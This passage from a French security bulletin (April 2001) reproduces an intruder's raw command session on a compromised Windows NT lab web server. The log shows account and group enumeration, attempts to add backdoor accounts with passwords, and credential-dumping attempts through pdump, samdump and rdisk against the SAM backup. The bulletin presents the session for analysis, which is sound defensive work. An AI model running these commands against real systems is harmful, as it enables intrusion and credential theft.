09/25/97 08:24a 23,312 msadcf.dll<br />
09/25/97 08:24a 91,408 msadco.dll<br />
09/25/97 08:19a 5,120 msadcor.dll<br />
09/26/97 08:19a 42,256 msadcs.dll<br />
02/04/01 06:41a 59,392 nc.exe<br />
02/04/01 06:41a 32,768 pdump.exe<br />
10/02/97 07:28a 19,388 readme.txt<br />
02/04/01 06:41a 36,864 samdump.dll<br />
16 File(s) 698,383 bytes<br />
1,690,861,056 bytes free<br />
C:\Program Files\Common Files\system\msadc>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\Program Files\Common Files\system\msadc> [Adir<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\Program Files\Common Files\system\msadc>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\Program Files\Common Files\system\msadc>del ftpcom<br />
C:\Program Files\Common Files\system\msadc>ls<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\Program Files\Common Files\system\msadcr>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\Program Files\Common Files\system\msadc> type readme.e<br />
The system cannot find the file specified.<br />
C:\Program Files\Common Files\system\msadc>c:<br />
The filename, directory name, or volume label<br />
syntax is incorrect.<br />
C:\Program Files\Common Files\system\msadc>cd\<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 06:26a 7 fun<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:42a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
14 File(s) 78,643,529 bytes<br />
1,690,861,056 bytes free<br />
C:\>rm<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\>del fun<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:42a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
13 File(s) 78,643,522 bytes<br />
1,690,861,056 bytes free<br />
C:\>cd exploites<br />
The system cannot find the path specified.<br />
C:\>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\>cd exploits<br />
C:\exploits>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits<br />
12/26/00 07:36p .<br />
12/26/00 07:36p ..<br />
12/26/00 07:36p microsoft<br />
12/26/00 07:35p newfiles<br />
12/26/00 07:24p unix<br />
5 File(s) 0 bytes<br />
1,690,861,056 bytes free<br />
C:\exploits>cd microsoft<br />
C:\exploits\microsoft>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\microsoft<br />
12/26/00 07:36p .<br />
12/26/00 07:36p ..<br />
11/05/97 09:46a 87,312 95sscrk.zip<br />
08/15/00 02:06p 734 ac.zip<br />
08/12/98 09:46a 9,417 anger.tar.gz<br />
5 File(s) 97,463 bytes<br />
1,690,861,056 bytes free<br />
C:\exploits\microsoft>cd ..<br />
C:\exploits>cd newfiles<br />
C:\exploits\newfiles>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\newfiles<br />
12/26/00 07:35p .<br />
12/26/00 07:35p ..<br />
2 File(s) 0 bytes<br />
1,690,861,056 bytes free<br />
C:\exploits\newfiles>cd ..<br />
C:\exploits>cd unix<br />
C:\exploits\unix>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\unix<br />
12/26/00 07:24p .<br />
12/26/00 07:24p ..<br />
12/26/00 07:25p sunos-exploits<br />
12/26/00 07:24p tcp-exploits<br />
12/26/00 07:24p trojans<br />
12/26/00 07:16p udp-exploits<br />
12/26/00 07:15p ultrix-exploits<br />
12/26/00 07:15p xwin-exploits<br />
8 File(s) 0 bytes<br />
1,690,861,056 bytes free<br />
C:\exploits\unix>cd ..<br />
C:\exploits>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits<br />
12/26/00 07:36p .<br />
12/26/00 07:36p ..<br />
12/26/00 07:36p microsoft<br />
12/26/00 07:35p newfiles<br />
12/26/00 07:24p unix<br />
5 File(s) 0 bytes<br />
1,690,861,056 bytes free<br />
C:\exploits>cd ..<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:42a WINNT<br />
12/26/00 07:09p wiretrip<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 49/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
02/04/01 06:43a 0 yay.txt<br />
13 File(s) 78,643,522 bytes<br />
1,690,861,056 bytes free<br />
1,690,861,056 bytes free<br />
C:\>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\>dir'<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\>cat yay<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\>type yay.<br />
The system cannot find the file specified.<br />
C:\>type yay.txt<br />
C:\>net session<br />
System error 5 has occurred.<br />
Access is denied.<br />
C:\>net users<br />
User accounts for \\<br />
---------------------------------------------------<br />
Administrator Guest IUSR_KENNY IWAM_KENNY<br />
The command completed with one or more errors.<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:46a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
02/04/01 06:46a 38 yay2.txt<br />
14 File(s) 78,643,560 bytes<br />
1,690,861,056 bytes free<br />
C:\>type yay2.txt<br />
There are no entries in the list.<br />
C:\>del yay2.txt<br />
del yay2.txt<br />
C:\>net session >>yay3.txt<br />
System error 5 has occurred.<br />
Access is denied.<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:46a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
02/04/01 06:48a 0 yay3.txt<br />
14 File(s) 78,643,522 bytes<br />
1,690,861,056 bytes free<br />
C:\>del yay& *<br />
Could Not Find C:\yay<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\>del yay*<br />
The process cannot access the file because<br />
it is being used by another process.<br />
C:\>del yay3.txt<br />
Could Not Find C:\yay3.txt<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:46a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
13 File(s) 78,643,522 bytes<br />
1,690,861,056 bytes free<br />
C:\>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\>yuper<br />
The name specified is not recognized as an<br />
internal or external command, operable program or<br />
batch file.<br />
C:\>type heh.txt<br />
User accounts for \\<br />
---------------------------------------------------<br />
Administrator Guest IUSR_KENNY IWAM_KENNY<br />
The command completed with one or more errors.<br />
C:\>del heh.txt<br />
C:\>cd program files<br />
C:\Program Files>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files<br />
12/21/00 08:59p .<br />
12/21/00 08:59p ..<br />
12/07/00 03:11p Common Files<br />
12/21/00 08:59p D4<br />
12/07/00 03:23p ICW-Internet Connection<br />
12/07/00 03:37p Microsoft FrontPage<br />
12/07/00 03:34p Mts<br />
12/07/00 03:23p Outlook Express<br />
11/26/00 06:42p Plus!<br />
12/16/00 06:54p Syslogd<br />
11/26/00 06:56p Windows NT<br />
11 File(s) 0 bytes<br />
1,690,861,056 bytes free<br />
C:\Program Files>cd ..<br />
C:\dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:48a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
13 File(s) 78,643,522 bytes<br />
1,690,861,056 bytes free<br />
C:\>echo Hi, i know that this a is a lab server, but<br />
patch the holes! :-)<br />
>>README.NOW.Hax0r<br />
echo Hi, i know that this a is a lab server, but patch<br />
the holes! :-) >>README.NOW.Hax0r<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 50/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:48a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
14 File(s) 78,643,591 bytes<br />
1,690,861,056 bytes free<br />
C:\>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\>net group<br />
Group Accounts for \\<br />
---------------------------------------------------<br />
*Domain Admins *Domain Guests *Domain Users<br />
The command completed with one or more errors.<br />
C:\>net localgroup<br />
System error 1312 has occurred. A specified logon<br />
session does not exist.It may already have been<br />
terminated.<br />
C:\>net group domaine admins<br />
The syntax of this command is:<br />
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]<br />
groupname {/ADD [/COMMENT:"text"] | /DELETE<br />
[/DOMAIN] groupname username [...] {/ADD | /DELETE}<br />
[/DOMAIN]<br />
C:\> [Anet group /?<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batch ile.<br />
C:\>net group ??<br />
The syntax of this command is:<br />
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]<br />
groupname {/ADD [/COMMENT:"text"] | /DELETE<br />
[/DOMAIN] groupname username [...] {/ADD | /DELETE}<br />
[/DOMAIN]<br />
C:\>net group /?<br />
(Résultats identiques - Aucun changement)<br />
C:\>net group<br />
Group Accounts for \\<br />
---------------------------------------------------<br />
*Domain Admins *Domain Guests *Domain Users<br />
The command completed with one or more errors.<br />
C:\>net localgroup<br />
System error 1312 has occurred. A specified logon<br />
session does not exist. It may already have been<br />
terminated.<br />
C:\>net localgroup /domain admins<br />
(Résultats identiques - Aucun changement)<br />
C:\>net localgroup domain admins<br />
The syntax of this command is:<br />
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]<br />
groupname {/ADD [/COMMENT:"text"] | /DELETE<br />
[/DOMAIN] groupname username [...] {/ADD | /DELETE}<br />
[/DOMAIN]<br />
C:\>net users<br />
User accounts for \\<br />
---------------------------------------------------<br />
Administrator Guest IUSR_KENNY IWAM_KENNY<br />
The command completed with one or more errors.<br />
C:\>net session<br />
System error 5 has occurred.<br />
Access is denied.<br />
C:\> [A [A [Anet localgroup domain admins<br />
The name specified is not recognized as an internal or<br />
external command, operable program or batch file.<br />
C:\>net group domain admins<br />
The syntax of this command is:<br />
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]<br />
groupname {/ADD [/COMMENT:"text"] | /DELETE<br />
[/DOMAIN] groupname username [...] {/ADD | /DELETE}<br />
[/DOMAIN]<br />
C:\>net localgroup administrators<br />
Alias name administrators<br />
Comment Members can fully administer the<br />
computer/domain Members<br />
---------------------------------------------------<br />
Administrator Domain Admins<br />
The command completed successfully.<br />
C:\> [Anet localgroup administrators<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\>net localgroup administrators<br />
Alias name administrators<br />
Comment Members can fully administer the<br />
computer/domain Members<br />
---------------------------------------------------<br />
Administrator Domain Admins IUSR_KENNY IWAM_KENNY<br />
The command completed successfully.<br />
C:\>net session<br />
System error 5 has occurred.<br />
Access is denied.<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
02/04/01 06:55a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
14 File(s) 78,643,591 bytes<br />
1,690,852,864 bytes free<br />
C:\>cd program files<br />
C:\Program Files>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files<br />
12/21/00 08:59p .<br />
12/21/00 08:59p ..<br />
12/07/00 03:11p Common Files<br />
12/21/00 08:59p D4<br />
12/07/00 03:23p ICW-Internet Connection<br />
12/07/00 03:37p Microsoft FrontPage<br />
12/07/00 03:34p Mts<br />
12/07/00 03:23p Outlook Express<br />
11/26/00 06:42p Plus!<br />
12/16/00 06:54p Syslogd<br />
11/26/00 06:56p Windows NT<br />
11 File(s) 0 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files>cd common files<br />
C:\Program Files\Common Files>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files\Common Files<br />
12/07/00 03:11p .<br />
12/07/00 03:11p ..<br />
12/07/00 03:23p Microsoft Shared<br />
12/07/00 03:35p ODBC<br />
12/07/00 03:23p Services<br />
12/07/00 03:23p System<br />
6 File(s) 0 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files\Common Files>cd obdc<br />
The system cannot find the path specified.<br />
C:\Program Files\Common Files>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\Program Files\Common Files>cd microsoft shadr red<br />
The filename, directory name, or volume label<br />
syntax is incorrect.<br />
C:\Program Files\Common Files>cd microsoft shared<br />
C:\Program Files\Common Files\Microsoft Shared>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program …<br />
12/07/00 03:23p .<br />
12/07/00 03:23p ..<br />
12/07/00 03:23p Stationery<br />
12/07/00 03:09p TextConv<br />
4 File(s) 0 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files\Common Files\Microsoft Shared>cd ..<br />
C:\Program Files\Common Files>cd odbc<br />
C:\Program Files\Common Files\ODBC>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 51/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Directory of C:\Program Files\Common Files\ODBC<br />
12/07/00 03:35p .<br />
12/07/00 03:35p ..<br />
12/07/00 03:35p Data Sources<br />
3 File(s) 0 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files\Common Files\ODBC>cd data dou<br />
The system cannot find the path specified.<br />
C:\Program Files\Common Files\ODBC>cd data sources<br />
C:\Program Files\Common Files\ODBC\Data Sources>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program …<br />
12/07/00 03:35p .<br />
12/07/00 03:35p ..<br />
2 File(s) 0 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files>cd..<br />
C:\Program Files\Common Files\ODBC>cd ..<br />
C:\Program Files\Common Files>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files\Common Files<br />
12/07/00 03:11p .<br />
12/07/00 03:11p ..<br />
12/07/00 03:23p Microsoft Shared<br />
12/07/00 03:35p ODBC<br />
12/07/00 03:23p Services<br />
12/07/00 03:23p System<br />
6 File(s) 0 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files\Common Files>cd system<br />
C:\Program Files\Common Files\System>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files\Common Files\System<br />
12/07/00 03:23p .<br />
12/07/00 03:23p ..<br />
12/07/00 03:34p ado<br />
02/04/01 06:43a msadc<br />
12/07/00 03:34p ole db<br />
11/11/97 12:50p 399,120 wab32.dll<br />
6 File(s) 399,120 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files\Common Files\System>cd msads<br />
The system cannot find the path specified.<br />
C:\Program Files\Common Files\System>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\Program Files\Common Files\System>cd msas dcs<br />
The filename, directory name, or volume label<br />
syntax is incorrect.<br />
C:\Program Files\Common Files\System>cd msadcc<br />
C:\Program Files\Common Files\System\msadc>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program …<br />
02/04/01 06:43a .<br />
02/04/01 06:43a ..<br />
09/25/97 07:41a 596 adcjavas.inc<br />
09/25/97 07:41a 589 adcvbs.inc<br />
04/30/97 11:00p 208,144 cmd1.exe<br />
09/25/97 08:28a 172,816 msadce.dll<br />
09/25/97 08:16a 5,632 msadcer.dll<br />
09/25/97 08:24a 23,312 msadcf.dll<br />
09/25/97 08:24a 91,408 msadco.dll<br />
09/25/97 08:19a 5,120 msadcor.dll<br />
09/26/97 08:19a 42,256 msadcs.dll<br />
02/04/01 06:41a 59,392 nc.exe<br />
02/04/01 06:41a 32,768 pdump.exe<br />
10/02/97 07:28a 19,388 readme.txt<br />
02/04/01 06:41a 36,864 samdump.dll<br />
15 File(s) 698,285 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files\Common Files\System\msadc>psu<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\Program Files\Common Files\System\msadc>pdump<br />
Failed to open lsass: 5. Exiting.<br />
C:\Program Files\Common Files\System\msadc>net start<br />
These Windows NT services are started:<br />
Alerter<br />
Computer Browser<br />
EventLog<br />
FTP Publishing Service<br />
IIS Admin Service<br />
License Logging Service<br />
Messenger<br />
MSDTC<br />
Net Logon<br />
NT LM Security Support Provider<br />
Plug and Play<br />
Protected Storage<br />
Remote Procedure Call (RPC) Locator<br />
Remote Procedure Call (RPC) Service<br />
Server<br />
Spooler<br />
TCP/IP NetBIOS Helper<br />
Workstation<br />
World Wide Web Publishing Service<br />
The command completed successfully.<br />
C:\Program Files\Common Files\System\msadc>net localgroup<br />
administrators<br />
Alias name administrators<br />
Comment Members can fully administer the<br />
computer/domain Members<br />
---------------------------------------------------<br />
Administrator Domain Admins IUSR_KENNY IWAM_KENNY<br />
The command completed successfully.<br />
C:\Program Files\Common Files\System\msadc>dir<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\Program Files\Common Files\System\msadc>net users<br />
User accounts for \\<br />
---------------------------------------------------<br />
Administrator Guest IUSR_KENNY IWAM_KENNY<br />
The command completed with one or more errors.<br />
C:\Program Files\Common Files\System\msadc>net users<br />
(Résultats identiques - Aucun changement)<br />
C:\Program Files\Common Files\System\msadc>net users /?<br />
The syntax of this command is:<br />
NET USER [username [password | *] [options]]<br />
[/DOMAIN] username {password | *} /ADD [options]<br />
[/DOMAIN] username [/DELETE] [/DOMAIN]<br />
C:\Program Files\Common Files\System\msadc>net users hi<br />
guy /ADD<br />
System error 1312 has occurred. A specified logon<br />
session does not exist. It may already have been<br />
terminated.<br />
C:\Program Files\Common Files\System\msadc>/net<br />
The filename, directory name, or volume label<br />
syntax is incorrect.<br />
C:\Program Files\Common Files\System\msadc>netnet password<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\Program Files\Common Files\System\msadc>net user<br />
User accounts for \\<br />
---------------------------------------------------<br />
Administrator Guest IUSR_KENNY IWAM_KENNY<br />
The command completed with one or more errors.<br />
C:\Program Files\Common Files\System\msadc>net user /?<br />
The syntax of this command is:<br />
NET USER [username [password | *] [options]]<br />
[/DOMAIN] username {password | *} /ADD [options]<br />
[/DOMAIN] username [/DELETE] [/DOMAIN]<br />
C:\Program Files\Common Files\System\msadc>net user himan<br />
HarHar666 /ADD<br />
System error 1312 has occurred. A specified logon<br />
session does not exist. It may already have been<br />
terminated.<br />
C:\Program Files\Common Files\System\msadc>net name<br />
Name<br />
--------------------------------------------------<br />
LAB<br />
ADMINISTRATOR<br />
The command completed successfully.<br />
C:\Program Files\Common Files\System\msadc>net user<br />
User accounts for \\<br />
---------------------------------------------------<br />
Administrator Guest IUSR_KENNY IWAM_KENNY<br />
The command completed with one or more errors.<br />
C:\Program Files\Common Files\System\msadc>net user<br />
Administrator<br />
System error 1312 has occurred. A specified logon<br />
session does not exist. It may already have been<br />
terminated.<br />
C:\Program Files\Common Files\System\msadc>cd /winnt<br />
The syntax of the command is incorrect.<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 52/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
C:\Program Files\Common Files\System\msadc>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program …<br />
02/04/01 06:43a .<br />
02/04/01 06:43a ..<br />
09/25/97 07:41a 596 adcjavas.inc<br />
09/25/97 07:41a 589 adcvbs.inc<br />
04/30/97 11:00p 208,144 cmd1.exe<br />
09/25/97 08:28a 172,816 msadce.dll<br />
09/25/97 08:16a 5,632 msadcer.dll<br />
09/25/97 08:24a 23,312 msadcf.dll<br />
09/25/97 08:24a 91,408 msadco.dll<br />
09/25/97 08:19a 5,120 msadcor.dll<br />
09/26/97 08:19a 42,256 msadcs.dll<br />
02/04/01 06:41a 59,392 nc.exe<br />
02/04/01 06:41a 32,768 pdump.exe<br />
10/02/97 07:28a 19,388 readme.txt<br />
02/04/01 06:41a 36,864 samdump.dll<br />
15 File(s) 698,285 bytes<br />
1,690,852,864 bytes free<br />
C:\Program Files\Common Files\System\msadc>cd \winnt<br />
C:\WINNT>cd C:\Program Files\Common Files\System \msadc<br />
C:\Program Files\Common Files\System\msadc>del c<br />
Could Not Find C:\Program Files\Common<br />
Files\System\msadc\c<br />
C:\Program Files\Common Files\System\msadc>del<br />
samdump.dll<br />
C:\Program Files\Common Files\System\msadc>del<br />
pdump.exe<br />
C:\Program Files\Common Files\System\msadc>del<br />
The syntax of the command is incorrect.<br />
C:\Program Files\Common Files\System\msadc>cd\winnt<br />
C:\WINNT>cd resp<br />
The filename, directory name, or volume label<br />
syntax is incorrect.<br />
C:\WINNT>cd repair<br />
C:\WINNT\repair>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\WINNT\repair<br />
11/26/00 06:43p .<br />
11/26/00 06:43p ..<br />
10/13/96 07:38p 438 autoexec.nt<br />
11/26/00 12:34p 2,510 config.nt<br />
11/26/00 06:43p 15,677 default._<br />
11/26/00 06:43p 14,946 ntuser.da_<br />
11/26/00 06:43p 4,593 sam._<br />
11/26/00 06:43p 6,066 security._<br />
11/26/00 06:54p 50,405 setup.log<br />
11/26/00 06:43p 124,776 software._<br />
11/26/00 06:43p 80,874 system._<br />
11 File(s) 300,285 bytes<br />
1,690,922,496 bytes free<br />
C:\WINNT\repair>rdisk -s/<br />
C:\WINNT\repair>d rd<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\WINNT\repair>rdisk -/s<br />
C:\WINNT\repair>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\WINNT\repair<br />
11/26/00 06:43p .<br />
11/26/00 06:43p ..<br />
10/13/96 07:38p 438 autoexec.nt<br />
11/26/00 12:34p 2,510 config.nt<br />
11/26/00 06:43p 15,677 default._<br />
11/26/00 06:43p 14,946 ntuser.da_<br />
11/26/00 06:43p 4,593 sam._<br />
11/26/00 06:43p 6,066 security._<br />
11/26/00 06:54p 50,405 setup.log<br />
11/26/00 06:43p 124,776 software._<br />
11/26/00 06:43p 80,874 system._<br />
11 File(s) 300,285 bytes<br />
1,690,922,496 bytes free<br />
C:\WINNT\repair>rdisk<br />
C:\WINNT\repair>rdisk -s<br />
C:\WINNT\repair>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\WINNT\repair<br />
11/26/00 06:43p .<br />
11/26/00 06:43p ..<br />
10/13/96 07:38p 438 autoexec.nt<br />
11/26/00 12:34p 2,510 config.nt<br />
11/26/00 06:43p 15,677 default._<br />
11/26/00 06:43p 14,946 ntuser.da_<br />
11/26/00 06:43p 4,593 sam._<br />
11/26/00 06:43p 6,066 security._<br />
11/26/00 06:54p 50,405 setup.log<br />
11/26/00 06:43p 124,776 software._<br />
11/26/00 06:43p 80,874 system._<br />
11 File(s) 300,285 bytes<br />
1,690,922,496 bytes free<br />
C:\WINNT\repair>cat<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\WINNT\repair>type sam._<br />
Access is denied.<br />
C:\WINNT\repair>dir (taille $$hive$$.tmp augmente)<br />
C:\WINNT\repair>dir (taille $$hive$$.tmp augmente)<br />
C:\WINNT\repair>dir (taille $$hive$$.tmp augmente)<br />
C:\WINNT\repair>dir (taille $$hive$$.tmp augmente)<br />
C:\WINNT\repair>dir (taille $$hive$$.tmp stable)<br />
C:\WINNT\repair>dir (taille $$hive$$.tmp stable)<br />
C:\WINNT\repair>dir (taille $$hive$$.tmp stable)<br />
C:\WINNT\repair>cd\<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
